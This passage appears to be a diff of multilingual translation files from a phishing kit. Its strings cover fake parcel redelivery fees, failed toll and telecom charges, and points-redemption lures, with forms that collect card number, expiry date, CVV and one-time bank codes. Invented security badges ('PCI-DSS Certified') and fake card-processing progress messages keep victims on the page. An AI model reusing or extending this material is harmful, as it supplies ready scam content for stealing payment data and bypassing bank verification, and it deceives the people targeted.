"Dear customer": "親愛的顧客:",
"Electronic Communications Charge Payment Failed": "電子通訊費付款失敗",
"Invoice Number": "發票號碼",
"Amount": "金額",
"Pay Immediately": "立即付款",
"Phone Number": "電話號碼",
"Electronic communication fee payment failed": "電子通訊費付款失敗",
"Illustrate":"說明",
"Processing Payment":"正在處理付款,請稍候",
"Waiting":"請稍候",
};

View File

@@ -0,0 +1,81 @@
export default {
"There is an error in this field, please check":
"Hiba történt ebben a mezőben, kérjük, ellenőrizze",
"Please enter a valid email address": "Kérjük, adjon meg egy érvényes e-mail címet",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Kedves felhasználók, kérjük, gondosan töltse ki az űrlapot a sikeres kézbesítés érdekében",
"Your Name": "Az Ön neve",
"Address": "Cím",
"Detailed Address": "Részletes cím",
"(Optional)": "(Opcionális)",
"City": "Város",
"State": "Állam",
"Province": "Megye",
"Region": "Régió",
"Zip Code": "Irányítószám",
"E-Mail": "E-mail",
"Next": "Tovább",
"Telephone Number": "Telefonszám",
"Online": "Online",
"Payment": "Fizetés",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"A visszaszállításhoz bizonyos szolgáltatási díjakat kell felszámítanunk. A csomagot a fizetés után kézbesítjük újra",
"lump sum: ": "átalányösszeg: ",
"Cardholder": "Kártyatulajdonos",
"Card Number": "Kártyaszám",
"Expire Date": "Lejárati dátum",
"Security Code": "Biztonsági kód",
"Submit": "Küldés",
"Click here to receive another code": "Kattintson ide egy másik kód fogadásához",
"Please confirm your identity and a one-time code will be sent":
"Kérjük, erősítse meg személyazonosságát, és egy egyszeri kódot küldünk a mobiltelefonszámára vagy e-mail címére. Kérjük, itt adja meg az ellenőrző kódot",
"The verification code has been sent to":
"Az ellenőrző kódot elküldtük a következő címre:",
"Please do not click the":
"Kérjük, ne kattintson a 'Frissítés' vagy a 'Vissza' gombokra, mert ez megszakíthatja a tranzakciót",
"Verification code error, please try again":
"Ellenőrző kód hiba, kérjük, próbálja újra",
"The session is about to expire, please complete the verification now":
"A munkamenet hamarosan lejár, kérjük, fejezze be az ellenőrzést most",
"This card does not support this transaction, please try another card":
"Ez a kártya nem támogatja ezt a tranzakciót, kérjük, próbáljon meg egy másik kártyát",
"Authorized bank": "Engedélyezett bank",
"Please go to the bank App to confirm the authorization":
"Kérjük, menjen a banki alkalmazásba az engedélyezés megerősítéséhez",
"Please do not close this page": "Kérjük, ne zárja be ezt az oldalt",
"Payment Successful": "Sikeres fizetés!",
"Thank you for your purchase. Your payment has been processed successfully":
"Köszönjük a vásárlást. A fizetése sikeresen feldolgozva",
"Mailing address": "Levelezési cím",
"street address or house number": "utca vagy házszám",
"Apartment number": "Lakásszám, szobaszám stb.",
"Safe payment": "Biztonságos fizetés",
"Verification code": "Ellenőrző kód",
"Welcome": "Üdvözöljük",
"back":"vissza!",
"We reward you for using point services": "Megjutalmazzuk a pontszolgáltatások használatáért",
"Check your points": "Ellenőrizze a pontjait",
"Phone number": "Telefonszám",
"Inquire": "Érdeklődés",
"Exchange": "Csere",
"Spend points": "Pontok felhasználása",
"Points Available": "Elérhető pontok",
"You don't have enough points": "Nincs elég pontja",
"Please redeem your favorite product": "Kérjük, váltsa be kedvenc termékét",
"Confirm your shipping address": "Erősítse meg szállítási címét",
"Order number": "Rendelésszám: ",
"Pay": "Fizetés",
"Pay Message": "Fizessen {0}-t a pontok áruértékre váltásához",
"Pay electronic tolls online": "Fizessen elektronikus útdíjat online",
"your electronic toll payment was unsuccessful": "az elektronikus útdíj fizetése sikertelen volt.",
"Billing Information": "Számlázási adatok",
"Description": "Leírás",
"Dear customer": "Kedves vásárlónk:",
"Electronic Communications Charge Payment Failed": "Az elektronikus kommunikációs díj fizetése sikertelen",
"Invoice Number": "Számlaszám",
"Amount": "Összeg",
"Pay Immediately": "Fizessen azonnal",
"Phone Number": "Telefonszám",
"Electronic communication fee payment failed": "Az elektronikus kommunikációs díj fizetése sikertelen",
"Illustrate":"Szemléltet"
};

View File

@@ -0,0 +1,109 @@
export default {
"There is an error in this field, please check":
"Има грешка во ова поле, ве молиме проверете",
"Please enter a valid email address": "Ве молиме внесете валидна е-адреса",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Почитувани корисници, ве молиме внимателно пополнете го формуларот за да се осигура успешна достава",
"Your Name": "Вашето име",
"Address": "Адреса",
"Detailed Address": "Детална адреса",
"(Optional)": "(Опционално)",
"City": "Град",
"State": "Држава/Област",
"Province": "Покраина",
"Region": "Регион",
"Zip Code": "Поштенски број",
"E-Mail": "Е-пошта",
"Next": "Понатаму",
"Telephone Number": "Телефонски број",
"Online": "Онлајн",
"Payment": "Плаќање",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"За повторна достава, потребно е да наплатиме одредени трошоци за услугата. Вашата пратка ќе биде повторно доставена по плаќањето",
"lump sum: ": "Вкупен износ: ",
"Cardholder": "Име на картичката",
"Card Number": "Број на картичка",
"Expire Date": "Датум на истекување",
"Security Code": "Сигурносен код",
"Submit": "Потврди",
"Click here to receive another code": "Кликнете овде за да добиете нов код",
"Please confirm your identity and a one-time code will be sent":
"Ве молиме потврдете го вашиот идентитет. Еднократен код ќе биде испратен на вашиот мобилен број или е-пошта. Ве молиме внесете го кодот за потврда овде",
"The verification code has been sent to":
"Кодот за потврда е испратен на",
"Please do not click the":
"Ве молиме не кликнувајте на копчињата „Освежи“ или „Назад“, бидејќи тоа може да ја прекине вашата трансакција",
"Verification code error, please try again":
"Грешка во кодот за потврда, ве молиме обидете се повторно",
"The session is about to expire, please complete the verification now":
"Сесијата наскоро ќе истече, ве молиме завршете ја потврдата сега",
"This card does not support this transaction, please try another card":
"Оваа картичка не ја поддржува оваа трансакција, ве молиме обидете се со друга картичка",
"Authorized bank": "Овластена банка",
"Please go to the bank App to confirm the authorization":
"Ве молиме отворете ја апликацијата на вашата банка за да ја потврдите авторизацијата",
"Please do not close this page": "Ве молиме не ја затворајте оваа страница",
"Payment Successful": "Плаќањето е успешно!",
"Thank you for your purchase. Your payment has been processed successfully":
"Ви благодариме за плаќањето. Вашата трансакција е успешно обработена",
"Mailing address": "Адреса за испорака",
"street address or house number": "Име на улица или куќен број",
"Apartment number": "Број на стан, соба итн.",
"Safe payment": "Безбедно плаќање",
"Verification code": "Код за потврда",
"Welcome": "Добредојдовте",
"back": "назад!",
"We reward you for using point services": "Ве наградуваме за користење на нашите услуги со поени",
"Check your points": "Проверете ги вашите поени",
"Phone number": "Телефонски број",
"Inquire": "Провери",
"Exchange": "Замени",
"Spend points": "Потроши поени",
"Points Available": "Достапни поени",
"You don't have enough points": "Немате доволно поени",
"Please redeem your favorite product": "Ве молиме заменете ги поените за вашиот омилен производ",
"Confirm your shipping address": "Потврдете ја вашата адреса за испорака",
"Order number": "Број на нарачка: ",
"Pay": "Плати",
"Pay Message": "Платете {0} за да ги замените поените за производи",
"Pay electronic tolls online": "Платете електронска патарина онлајн",
"your electronic toll payment was unsuccessful": "Вашето плаќање на електронската патарина беше неуспешно.",
"Billing Information": "Информации за наплата",
"Description": "Опис",
"Dear customer": "Почитуван кориснику:",
"Electronic Communications Charge Payment Failed": "Неуспешно плаќање на надоместокот за електронски комуникации",
"Invoice Number": "Број на фактура",
"Amount": "Износ",
"Pay Immediately": "Плати веднаш",
"Phone Number": "Телефонски број",
"Electronic communication fee payment failed": "Плаќањето на надоместокот за електронски комуникации не успеа",
"Illustrate": "Илустрација/Објаснување",
"SSL Encryption": "SSL енкрипција",
"PCI-DSS Certified": "PCI-DSS сертифицирано",
"Transaction Details": "Детали за трансакцијата",
"Transaction ID:": "ID на трансакција:",
"Processing Network:": "Мрежа за обработка:",
"Processing Time:": "Време на обработка:",
"Security Level:": "Ниво на безбедност:",
"Preparing...": "Се подготвува...",
"High": "Високо",
"Initializing payment environment...": "Иницијализирање на околината за плаќање...",
"Encrypting card information...": "Енкриптирање на податоците од картичката...",
"Establishing secure connection...": "Воспоставување безбедна врска...",
"Verifying card number and issuer...": "Проверка на бројот на картичката и издавачот...",
"Validating CVV code...": "Проверка на CVV кодот...",
"Checking fraud risk...": "Проверка на ризик од измама...",
"Sending transaction request...": "Испраќање барање за трансакција...",
"Waiting for bank authorization...": "Се чека авторизација од банката...",
"Processing bank response...": "Се обработува одговорот од банката...",
"Confirming transaction status...": "Се потврдува статусот на трансакцијата...",
"Finalizing transaction...": "Финализирање на трансакцијата...",
"Visa Secure Network": "Visa Secure Network",
"Mastercard Global Payment Network": "Mastercard Global Payment Network",
"American Express Dedicated Channel": "American Express Dedicated Channel",
"UnionPay Gateway": "UnionPay Gateway",
"{time} seconds": "{time} секунди",
"International Payment Network": "Меѓународна мрежа за плаќање",
"redelivery_fee_message": "За повторна достава потребно е да платите {amount} за трошоци за услугата. Вашата пратка ќе биде повторно доставена по плаќањето",
"Verifying...": "Се врши проверка...",
};

View File

@@ -0,0 +1,97 @@
export default {
"There is an error in this field, please check": "Er is een fout in dit veld, controleer het alstublieft",
"Please enter a valid email address": "Voer een geldig e-mailadres in",
"Dear users, please fill in the form carefully to ensure the successful delivery": "Beste gebruikers, vul het formulier zorgvuldig in om een succesvolle levering te garanderen",
"Your Name": "Uw naam",
"Address": "Adres",
"Detailed Address": "Gedetailleerd adres",
"(Optional)": "(Optioneel)",
"City": "Stad",
"State": "Staat",
"Province": "Provincie",
"Region": "Regio",
"Zip Code": "Postcode",
"E-Mail": "E-mail",
"Next": "Volgende",
"Telephone Number": "Telefoonnummer",
"Online": "Online",
"Payment": "Betaling",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment": "Voor herlevering moeten we servicekosten in rekening brengen. Uw pakket wordt opnieuw verzonden na betaling",
"lump sum: ": "totaalbedrag: ",
"Cardholder": "Kaarthouder",
"Card Number": "Kaartnummer",
"Expire Date": "Vervaldatum",
"Security Code": "Beveiligingscode",
"Submit": "Verzenden",
"Click here to receive another code": "Klik hier om een andere code te ontvangen",
"Please confirm your identity and a one-time code will be sent": "Bevestig uw identiteit en een eenmalige code wordt verzonden naar uw telefoonnummer of e-mailadres. Voer hier de verificatiecode in",
"The verification code has been sent to": "De verificatiecode is verzonden naar",
"Please do not click the": "Klik niet op de knoppen 'Vernieuwen' of 'Terug', dit kan uw transactie beëindigen",
"Verification code error, please try again": "Verificatiecode onjuist, probeer het opnieuw",
"The session is about to expire, please complete the verification now": "De sessie verloopt bijna, voltooi nu de verificatie",
"This card does not support this transaction, please try another card": "Deze kaart ondersteunt deze transactie niet, probeer een andere kaart",
"Authorized bank": "Geautoriseerde bank",
"Please go to the bank App to confirm the authorization": "Ga naar de bank-app om de autorisatie te bevestigen",
"Please do not close this page": "Sluit deze pagina niet",
"Payment Successful": "Betaling geslaagd!",
"Thank you for your purchase. Your payment has been processed successfully": "Bedankt voor uw aankoop. Uw betaling is succesvol verwerkt",
"Mailing address": "Postadres",
"street address or house number": "Straatnaam of huisnummer",
"Apartment number": "Appartementnummer, kamernummer, enz.",
"Safe payment": "Veilige betaling",
"Verification code": "Verificatiecode",
"Welcome": "Welkom",
"back": "Terug!",
"We reward you for using point services": "Wij belonen u voor het gebruik van puntendiensten",
"Check your points": "Controleer uw punten",
"Phone number": "Telefoonnummer",
"Inquire": "Opvragen",
"Exchange": "Inwisselen",
"Spend points": "Besteed punten",
"Points Available": "Beschikbare punten",
"You don't have enough points": "U heeft niet genoeg punten",
"Please redeem your favorite product": "Wissel uw favoriete product in",
"Confirm your shipping address": "Bevestig uw verzendadres",
"Order number": "Bestelnummer: ",
"Pay": "Betalen",
"Pay Message": "Betaal {0} om punten in te wisselen voor producten",
"Pay electronic tolls online": "Betaal elektronische tol online",
"your electronic toll payment was unsuccessful": "Uw elektronische tolbetaling is mislukt.",
"Billing Information": "Factuurinformatie",
"Description": "Beschrijving",
"Dear customer": "Geachte klant:",
"Electronic Communications Charge Payment Failed": "Betaling van elektronische communicatiekosten mislukt",
"Invoice Number": "Factuurnummer",
"Amount": "Bedrag",
"Pay Immediately": "Betaal onmiddellijk",
"Phone Number": "Telefoonnummer",
"Electronic communication fee payment failed": "Betaling van elektronische communicatiekosten mislukt",
"Illustrate": "Illustreren",
"SSL Encryption": "SSL-versleuteling",
"PCI-DSS Certified": "PCI-DSS-gecertificeerd",
"Transaction Details": "Transactiedetails",
"Transaction ID:": "Transactie-ID:",
"Processing Network:": "Verwerkingsnetwerk:",
"Processing Time:": "Verwerkingstijd:",
"Security Level:": "Beveiligingsniveau:",
"Preparing...": "Voorbereiden...",
"High": "Hoog",
"Initializing payment environment...": "Betaalomgeving initialiseren...",
"Encrypting card information...": "Kaartgegevens versleutelen...",
"Establishing secure connection...": "Veilige verbinding tot stand brengen...",
"Verifying card number and issuer...": "Kaartnummer en uitgever verifiëren...",
"Validating CVV code...": "CVV-code valideren...",
"Checking fraud risk...": "Frauderisico controleren...",
"Sending transaction request...": "Transactieverzoek verzenden...",
"Waiting for bank authorization...": "Wachten op bankautorisatie...",
"Processing bank response...": "Reactie van bank verwerken...",
"Confirming transaction status...": "Transactiestatus bevestigen...",
"Finalizing transaction...": "Transactie afronden...",
"Visa Secure Network": "Visa Secure Netwerk",
"Mastercard Global Payment Network": "Mastercard Wereldwijd Betalingsnetwerk",
"American Express Dedicated Channel": "American Express Toegewijd Kanaal",
"UnionPay Gateway": "UnionPay Gateway",
"{time} seconds": "{time} seconden",
"International Payment Network": "Internationaal Betalingsnetwerk",
"redelivery_fee_message": "Voor herlevering brengen we {amount} servicekosten in rekening. Uw pakket wordt opnieuw verzonden na betaling",
};

View File

@@ -0,0 +1,109 @@
export default {
"There is an error in this field, please check":
"Det er en feil i dette feltet, vennligst sjekk det",
"Please enter a valid email address": "Vennligst oppgi en gyldig e-postadresse",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Kjære brukere, vennligst fyll ut skjemaet nøye for å sikre vellykket levering",
"Your Name": "Ditt navn",
"Address": "Adresse",
"Detailed Address": "Detaljert adresse",
"(Optional)": "(Valgfritt)",
"City": "By",
"State": "Delstat",
"Province": "Provins",
"Region": "Region",
"Zip Code": "Postnummer",
"E-Mail": "E-post",
"Next": "Neste",
"Telephone Number": "Telefonnummer",
"Online": "Online",
"Payment": "Betaling",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"For ny levering må vi ta et servicegebyr. Din pakke vil bli levert på nytt etter betaling",
"lump sum: ": "Totalbeløp: ",
"Cardholder": "Kortinnehaver",
"Card Number": "Kortnummer",
"Expire Date": "Utløpsdato",
"Security Code": "Sikkerhetskode",
"Submit": "Send inn",
"Click here to receive another code": "Klikk her for å motta en ny kode",
"Please confirm your identity and a one-time code will be sent":
"Vennligst bekreft identiteten din, en engangskode vil bli sendt til ditt mobilnummer eller e-post. Skriv inn verifiseringskoden her",
"The verification code has been sent to":
"Verifiseringskoden er sendt til",
"Please do not click the":
"Vennligst ikke klikk på knappene «Oppdater» eller «Tilbake», da dette kan avslutte eller avbryte transaksjonen",
"Verification code error, please try again":
"Feil i verifiseringskode, vennligst prøv igjen",
"The session is about to expire, please complete the verification now":
"Økten er i ferd med å utløpe, vennligst fullfør verifiseringen nå",
"This card does not support this transaction, please try another card":
"Dette kortet støtter ikke denne transaksjonen, vennligst prøv et annet kort",
"Authorized bank": "Autorisert bank",
"Please go to the bank App to confirm the authorization":
"Vennligst åpne bank-appen for å bekrefte autorisasjonen",
"Please do not close this page": "Vennligst ikke lukk denne siden",
"Payment Successful": "Betaling vellykket!",
"Thank you for your purchase. Your payment has been processed successfully":
"Takk for ditt kjøp. Betalingen er behandlet vellykket",
"Mailing address": "Postadresse",
"street address or house number": "Gateadresse eller husnummer",
"Apartment number": "Leilighetsnummer, romnummer osv.",
"Safe payment": "Sikker betaling",
"Verification code": "Verifiseringskode",
"Welcome": "Velkommen",
"back":"tilbake!",
"We reward you for using point services": "Vi belønner deg for å bruke vårt poengsystem",
"Check your points": "Sjekk poengene dine",
"Phone number": "Telefonnummer",
"Inquire": "Forespør",
"Exchange": "Bytt",
"Spend points": "Bruk poeng",
"Points Available": "Tilgjengelige poeng",
"You don't have enough points": "Du har ikke nok poeng",
"Please redeem your favorite product": "Vennligst løs inn ditt favorittprodukt",
"Confirm your shipping address": "Bekreft leveringsadressen din",
"Order number": "Ordrenummer: ",
"Pay": "Betal",
"Pay Message": "Betal {0} for å løse inn poeng mot varer",
"Pay electronic tolls online": "Betal elektronisk bompenger online",
"your electronic toll payment was unsuccessful": "Din elektroniske bompengebetaling mislyktes.",
"Billing Information": "Faktureringsinformasjon",
"Description": "Beskrivelse",
"Dear customer": "Kjære kunde:",
"Electronic Communications Charge Payment Failed": "Betaling av elektronisk kommunikasjonsavgift mislyktes",
"Invoice Number": "Fakturanummer",
"Amount": "Beløp",
"Pay Immediately": "Betal umiddelbart",
"Phone Number": "Telefonnummer",
"Electronic communication fee payment failed": "Betaling av elektronisk kommunikasjonsavgift mislyktes",
"Illustrate":"Illustrere",
"SSL Encryption": "SSL-kryptering",
"PCI-DSS Certified": "PCI-DSS-sertifisert",
"Transaction Details": "Transaksjonsdetaljer",
"Transaction ID:": "Transaksjons-ID:",
"Processing Network:": "Behandlingsnettverk:",
"Processing Time:": "Behandlingstid:",
"Security Level:": "Sikkerhetsnivå:",
"Preparing...": "Forbereder...",
"High": "Høy",
"Initializing payment environment...": "Initialiserer betalingsmiljø...",
"Encrypting card information...": "Krypterer kortinformasjon...",
"Establishing secure connection...": "Etablerer sikker tilkobling...",
"Verifying card number and issuer...": "Verifiserer kortnummer og utsteder...",
"Validating CVV code...": "Validerer CVV-kode...",
"Checking fraud risk...": "Sjekker svindelrisiko...",
"Sending transaction request...": "Sender transaksjonsforespørsel...",
"Waiting for bank authorization...": "Venter på bankautorisering...",
"Processing bank response...": "Behandler banksvar...",
"Confirming transaction status...": "Bekrefter transaksjonsstatus...",
"Finalizing transaction...": "Fullfører transaksjon...",
"Visa Secure Network": "Visa Secure Network",
"Mastercard Global Payment Network": "Mastercard Global Payment Network",
"American Express Dedicated Channel": "American Express Dedikert Kanal",
"UnionPay Gateway": "UnionPay Gateway",
"{time} seconds": "{time} sekunder",
"International Payment Network": "Internasjonalt betalingsnettverk",
"redelivery_fee_message": "For ny levering må vi kreve {amount} i servicegebyr, pakken din vil bli levert på nytt etter betaling",
"Verifying...": "Verifiserer...",
};

View File

@@ -0,0 +1,84 @@
export default {
"There is an error in this field, please check":
"Há um erro neste campo, por favor verifique",
"Please enter a valid email address": "Por favor insira um endereço de e-mail válido",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Prezados usuários, por favor preencham o formulário com atenção para garantir a entrega bem-sucedida",
"Your Name": "Seu Nome",
"Address": "Endereço",
"Detailed Address": "Endereço Detalhado",
"(Optional)": "(Opcional)",
"City": "Cidade",
"State": "Estado",
"Province": "Província",
"Region": "Região",
"Zip Code": "Código Postal",
"E-Mail": "E-mail",
"Next": "Próximo",
"Telephone Number": "Número de Telefone",
"Online": "Online",
"Payment": "Pagamento",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"Para reentrega, será cobrada uma taxa de serviço. Seu pacote será reenviado após o pagamento",
"lump sum: ": "valor total: ",
"Cardholder": "Titular do Cartão",
"Card Number": "Número do Cartão",
"Expire Date": "Data de Validade",
"Security Code": "Código de Segurança",
"Submit": "Enviar",
"Click here to receive another code": "Clique aqui para receber outro código",
"Please confirm your identity and a one-time code will be sent":
"Por favor confirme sua identidade e um código único será enviado para seu número de celular ou e-mail. Insira o código de verificação aqui",
"The verification code has been sent to":
"O código de verificação foi enviado para",
"Please do not click the":
"Por favor, não clique nos botões 'Atualizar' ou 'Voltar', pois isso pode interromper sua transação",
"Verification code error, please try again":
"Erro no código de verificação, por favor tente novamente",
"The session is about to expire, please complete the verification now":
"A sessão está prestes a expirar, por favor conclua a verificação agora",
"This card does not support this transaction, please try another card":
"Este cartão não suporta esta transação, por favor tente outro cartão",
"Authorized bank": "Banco autorizado",
"Please go to the bank App to confirm the authorization":
"Por favor acesse o aplicativo do banco para confirmar a autorização",
"Please do not close this page": "Por favor, não feche esta página",
"Payment Successful": "Pagamento realizado com sucesso!",
"Thank you for your purchase. Your payment has been processed successfully":
"Obrigado pela sua compra. Seu pagamento foi processado com sucesso",
"Mailing address": "Endereço para entrega",
"street address or house number": "endereço da rua ou número da casa",
"Apartment number": "Número do apartamento, sala, etc.",
"Safe payment": "Pagamento seguro",
"Verification code": "Código de verificação",
"Welcome": "Bem-vindo",
"back": "voltar",
"We reward you for using point services": "Recompensamos você por usar os serviços com pontos",
"Check your points": "Verifique seus pontos",
"Phone number": "Número de telefone",
"Inquire": "Consultar",
"Exchange": "Trocar",
"Spend points": "Gastar pontos",
"Points Available": "Pontos disponíveis",
"You don't have enough points": "Você não tem pontos suficientes",
"Please redeem your favorite product": "Por favor, resgate seu produto favorito",
"Confirm your shipping address": "Confirme seu endereço de envio",
"Order number": "Número do pedido: ",
"Pay": "Pagar",
"Pay Message": "Pague {0} para trocar pontos por mercadoria",
"Pay electronic tolls online": "Pague pedágios eletrônicos online",
"your electronic toll payment was unsuccessful":
"seu pagamento de pedágio eletrônico não foi bem-sucedido.",
"Billing Information": "Informações de cobrança",
"Description": "Descrição",
"Dear customer": "Prezado cliente:",
"Electronic Communications Charge Payment Failed":
"Falha no pagamento da taxa de comunicações eletrônicas",
"Invoice Number": "Número da fatura",
"Amount": "Valor",
"Pay Immediately": "Pagar agora",
"Phone Number": "Número de telefone",
"Electronic communication fee payment failed":
"Falha no pagamento da taxa de comunicação eletrônica",
"Illustrate": "Ilustrar"
};

View File

@@ -0,0 +1,98 @@
export default {
"There is an error in this field, please check": "Có lỗi trong trường này, vui lòng kiểm tra",
"Please enter a valid email address": "Vui lòng nhập địa chỉ email hợp lệ",
"Dear users, please fill in the form carefully to ensure the successful delivery": "Kính gửi người dùng, vui lòng điền biểu mẫu cẩn thận để đảm bảo giao hàng thành công",
"Your Name": "Tên của bạn",
"Address": "Địa chỉ",
"Detailed Address": "Địa chỉ chi tiết",
"(Optional)": "(Tùy chọn)",
"City": "Thành phố",
"State": "Bang",
"Province": "Tỉnh",
"Region": "Khu vực",
"Zip Code": "Mã bưu chính",
"E-Mail": "Email",
"Next": "Tiếp theo",
"Telephone Number": "Số điện thoại",
"Online": "Trực tuyến",
"Payment": "Thanh toán",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment": "Để giao lại, chúng tôi cần tính một số phí dịch vụ. Gói hàng của bạn sẽ được giao lại sau khi thanh toán",
"lump sum: ": "Tổng số tiền: ",
"Cardholder": "Chủ thẻ",
"Card Number": "Số thẻ",
"Expire Date": "Ngày hết hạn",
"Security Code": "Mã bảo mật",
"Submit": "Gửi",
"Click here to receive another code": "Nhấp vào đây để nhận mã khác",
"Please confirm your identity and a one-time code will be sent": "Vui lòng xác nhận danh tính của bạn, mã xác minh sẽ được gửi đến số điện thoại hoặc email của bạn. Vui lòng nhập mã xác minh tại đây",
"The verification code has been sent to": "Mã xác minh đã được gửi đến",
"Please do not click the": "Vui lòng không nhấp vào nút 'Làm mới' hoặc 'Quay lại' vì điều này có thể chấm dứt giao dịch của bạn",
"Verification code error, please try again": "Mã xác minh không đúng, vui lòng thử lại",
"The session is about to expire, please complete the verification now": "Phiên làm việc sắp hết hạn, vui lòng hoàn tất xác minh ngay",
"This card does not support this transaction, please try another card": "Thẻ này không hỗ trợ giao dịch này, vui lòng thử thẻ khác",
"Authorized bank": "Ngân hàng được ủy quyền",
"Please go to the bank App to confirm the authorization": "Vui lòng mở ứng dụng ngân hàng để xác nhận ủy quyền",
"Please do not close this page": "Vui lòng không đóng trang này",
"Payment Successful": "Thanh toán thành công!",
"Thank you for your purchase. Your payment has been processed successfully": "Cảm ơn bạn đã mua hàng. Thanh toán của bạn đã được xử lý thành công",
"Mailing address": "Địa chỉ gửi thư",
"street address or house number": "Địa chỉ đường hoặc số nhà",
"Apartment number": "Số căn hộ, số phòng, v.v.",
"Safe payment": "Thanh toán an toàn",
"Verification code": "Mã xác minh",
"Welcome": "Chào mừng",
"back": "Quay lại!",
"We reward you for using point services": "Chúng tôi tặng thưởng khi bạn sử dụng dịch vụ tích điểm",
"Check your points": "Kiểm tra điểm của bạn",
"Phone number": "Số điện thoại",
"Inquire": "Tra cứu",
"Exchange": "Đổi",
"Spend points": "Tiêu điểm",
"Points Available": "Số điểm hiện có",
"You don't have enough points": "Bạn không đủ điểm",
"Please redeem your favorite product": "Vui lòng đổi sản phẩm yêu thích của bạn",
"Confirm your shipping address": "Xác nhận địa chỉ giao hàng của bạn",
"Order number": "Mã đơn hàng: ",
"Pay": "Thanh toán",
"Pay Message": "Thanh toán {0} để đổi điểm lấy hàng hóa",
"Pay electronic tolls online": "Thanh toán phí đường bộ trực tuyến",
"your electronic toll payment was unsuccessful": "Thanh toán phí đường bộ của bạn không thành công.",
"Billing Information": "Thông tin thanh toán",
"Description": "Mô tả",
"Dear customer": "Kính gửi khách hàng:",
"Electronic Communications Charge Payment Failed": "Thanh toán phí liên lạc điện tử không thành công",
"Invoice Number": "Số hóa đơn",
"Amount": "Số tiền",
"Pay Immediately": "Thanh toán ngay",
"Phone Number": "Số điện thoại",
"Electronic communication fee payment failed": "Thanh toán phí liên lạc điện tử không thành công",
"Illustrate": "Minh họa",
"SSL Encryption": "Mã hóa SSL",
"PCI-DSS Certified": "Được chứng nhận PCI-DSS",
"Transaction Details": "Chi tiết giao dịch",
"Transaction ID:": "Mã giao dịch:",
"Processing Network:": "Mạng xử lý:",
"Processing Time:": "Thời gian xử lý:",
"Security Level:": "Mức độ bảo mật:",
"Preparing...": "Đang chuẩn bị...",
"High": "Cao",
"Initializing payment environment...": "Đang khởi tạo môi trường thanh toán...",
"Encrypting card information...": "Đang mã hóa thông tin thẻ...",
"Establishing secure connection...": "Đang thiết lập kết nối an toàn...",
"Verifying card number and issuer...": "Đang xác minh số thẻ và nhà phát hành...",
"Validating CVV code...": "Đang xác thực mã CVV...",
"Checking fraud risk...": "Đang kiểm tra rủi ro gian lận...",
"Sending transaction request...": "Đang gửi yêu cầu giao dịch...",
"Waiting for bank authorization...": "Đang chờ ngân hàng ủy quyền...",
"Processing bank response...": "Đang xử lý phản hồi từ ngân hàng...",
"Confirming transaction status...": "Đang xác nhận trạng thái giao dịch...",
"Finalizing transaction...": "Đang hoàn tất giao dịch...",
"Visa Secure Network": "Mạng bảo mật Visa",
"Mastercard Global Payment Network": "Mạng thanh toán toàn cầu Mastercard",
"American Express Dedicated Channel": "Kênh chuyên dụng American Express",
"UnionPay Gateway": "Cổng thanh toán UnionPay",
"{time} seconds": "{time} giây",
"International Payment Network": "Mạng thanh toán quốc tế",
"redelivery_fee_message": "Để giao lại, chúng tôi cần thu phí dịch vụ {amount}, gói hàng của bạn sẽ được giao lại sau khi thanh toán",
"Verifying...": "Đang xác minh...",
};

View File

@@ -0,0 +1,109 @@
export default {
"There is an error in this field, please check":
"Ka një gabim në këtë fushë, ju lutemi kontrolloni",
"Please enter a valid email address": "Ju lutemi vendosni një adresë emaili të vlefshme",
"Dear users, please fill in the form carefully to ensure the successful delivery":
"Të nderuar përdorues, ju lutemi plotësoni formularin me kujdes për të siguruar dorëzim të suksesshëm",
"Your Name": "Emri juaj",
"Address": "Adresa",
"Detailed Address": "Adresa e detajuar",
"(Optional)": "(Opsionale)",
"City": "Qyteti",
"State": "Shteti / Zona",
"Province": "Provinca",
"Region": "Rajoni",
"Zip Code": "Kodi postar",
"E-Mail": "Email",
"Next": "Tjetër",
"Telephone Number": "Numri i telefonit",
"Online": "Online",
"Payment": "Pagesa",
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment":
"Për ridërgesë, duhet të tarifojmë disa tarifa shërbimi. Paketa juaj do të ridërgohet pas pagesës",
"lump sum: ": "Shuma totale: ",
"Cardholder": "Mbajtësi i kartës",
"Card Number": "Numri i kartës",
"Expire Date": "Data e skadencës",
"Security Code": "Kodi i sigurisë",
"Submit": "Dërgo",
"Click here to receive another code": "Klikoni këtu për të marrë një kod tjetër",
"Please confirm your identity and a one-time code will be sent":
"Ju lutemi konfirmoni identitetin tuaj. Një kod njëpërdorimësh do tju dërgohet në telefon ose email. Ju lutemi vendosni kodin këtu",
"The verification code has been sent to":
"Kodi i verifikimit është dërguar te",
"Please do not click the":
"Ju lutemi mos klikoni butonat “Rifresko” ose “Kthehu”, pasi kjo mund të ndërpresë transaksionin tuaj",
"Verification code error, please try again":
"Gabim në kodin e verifikimit, ju lutemi provoni përsëri",
"The session is about to expire, please complete the verification now":
"Seanca është gati të skadojë, ju lutemi përfundoni verifikimin tani",
"This card does not support this transaction, please try another card":
"Kjo kartë nuk e mbështet këtë transaksion, ju lutemi provoni një kartë tjetër",
"Authorized bank": "Banka e autorizuar",
"Please go to the bank App to confirm the authorization":
"Ju lutemi hapni aplikacionin e bankës për të konfirmuar autorizimin",
"Please do not close this page": "Ju lutemi mos e mbyllni këtë faqe",
"Payment Successful": "Pagesa u krye me sukses!",
"Thank you for your purchase. Your payment has been processed successfully":
"Faleminderit për blerjen. Pagesa juaj u përpunua me sukses",
"Mailing address": "Adresa e dorëzimit",
"street address or house number": "Emri i rrugës ose numri i shtëpisë",
"Apartment number": "Numri i apartamentit / dhomës",
"Safe payment": "Pagesë e sigurt",
"Verification code": "Kodi i verifikimit",
"Welcome": "Mirë se vini",
"back": "kthehu!",
"We reward you for using point services": "Ju shpërblejmë për përdorimin e shërbimeve me pikë",
"Check your points": "Kontrolloni pikët tuaja",
"Phone number": "Numri i telefonit",
"Inquire": "Kontrollo",
"Exchange": "Shkëmbim",
"Spend points": "Shpenzo pikët",
"Points Available": "Pikë të disponueshme",
"You don't have enough points": "Nuk keni mjaftueshëm pikë",
